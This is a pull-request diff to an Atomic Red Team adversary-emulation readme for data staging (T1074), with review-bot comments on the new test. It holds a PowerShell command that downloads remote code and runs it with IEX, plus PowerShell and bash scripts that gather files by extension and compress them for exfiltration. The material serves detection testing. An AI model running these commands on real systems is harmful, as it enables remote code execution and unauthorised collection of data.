T1074/collect-n-compress-file-types: Outlined a new collection > data staged attack type (collect n compress file types) within the T1074.md readme. Also raised a few questions on best practices
@@ -15,6 +15,7 @@ Data Sources: File monitoring, Process monitoring, Process command-line paramete
## Atomic Tests
- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
- [Atomic Test #2 - Collect all files extensions and stage within a compressed directory](#atomic-test-1---compress-all-file-types)
<br/>
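Review bot: the anchor in the new table-of-contents entry does not resolve: the added `- [Atomic Test #2 ...]` line links to `#atomic-test-1---compress-all-file-types`, but the heading introduced further down is `## Atomic Test #2 - Collect and Compress all file types`, which renders as `#atomic-test-2---collect-and-compress-all-file-types`; the entry text also differs from that heading. Suggest making the entry `- [Atomic Test #2 - Collect and Compress all file types](#atomic-test-2---collect-and-compress-all-file-types)` so the link works and follows the same title-equals-heading convention as the Test #1 entry above it.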
@@ -30,3 +31,77 @@ Utilize powershell to download discovery.bat and save to a local file
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
```
<br/>
<hr/>
<br/>
## Atomic Test #2 - Collect and Compress all file types
Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.
**Supported Platforms:**
- Windows
- Linux
#### Run it with `powershell`!
Note:
- ```{{ path }}```: requires a default path to start recursive search from
- ```{{ extension }}```: requires a file extension to search for
```
$FolderPath = '{{ path }}'
$FileExtension = '{{ extension }}'
New-Item -ItemType directory -Path C:\temp\staging
function TestPath()
{
$FileExists = Test-Path $FolderPath
If ($FileExists -eq $True)
{
Return $true
}
Else
{
Return $false
}
}
function ZipFiles()
{
Add-Type -Assembly System.IO.Compression.FileSystem
$compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal
[System.IO.Compression.ZipFile]::CreateFromDirectory("C:\temp\staging",
"C:\temp\staging.zip", $compressionLevel, $false)
}
$Result = (TestPath($FolderPath));
If ($Result)
{
$Dir = get-childitem $FolderPath -Recurse -ErrorAction Ignore
$List = $Dir | where {$_.extension -eq $FileExtension}
$List | Copy-Item -Destination C:\temp\staging\ -ErrorAction Ignore
}
else
{
"Folder path is incorrect."
}
ZipFiles
Remove-Item -Recurse -Force C:\temp\staging
```
#### Run it with `bash`!
Note:
- ```{{ path }}```: requires a default path to start recursive search from
- ```{{ extension }}```: requires a file extension to search for
```
mkdir -p /tmp/staging
find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
tar -zcvf /tmp/staging.tar.gz /tmp/staging/
rm -rf /tmp/staging
```
<br/>
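Review bot: in the PowerShell block the staging directory and the archive are created regardless of the path check: `New-Item -ItemType directory -Path C:\temp\staging` runs before `TestPath` is evaluated and `ZipFiles` runs after the `If`/`else`, so a wrong `{{ path }}` still leaves an empty `C:\temp\staging.zip` behind, and `TestPath()` declares no parameter, so `$Result = (TestPath($FolderPath));` ignores its argument and only works because `$FolderPath` is script-scoped. Suggest dropping the wrapper and moving both calls into the success branch, e.g. `If (Test-Path $FolderPath) { New-Item -ItemType directory -Path C:\temp\staging -Force; ...; ZipFiles }`, where `-Force` also avoids the error `New-Item` raises when the directory is left over from an earlier run. The two variants also disagree on the input format: `where {$_.extension -eq $FileExtension}` matches only when the extension includes the leading dot (`.docx`), while the bash `find ... -name '*{{ extension }}'` works either way, so the Note lines should state the expected form. Finally, `Copy-Item -Destination C:\temp\staging\` flattens the tree, so same-named files from different subfolders silently overwrite one another (and `-ErrorAction Ignore` hides any complaint); worth a sentence in the description or a `-Container`-style alternative.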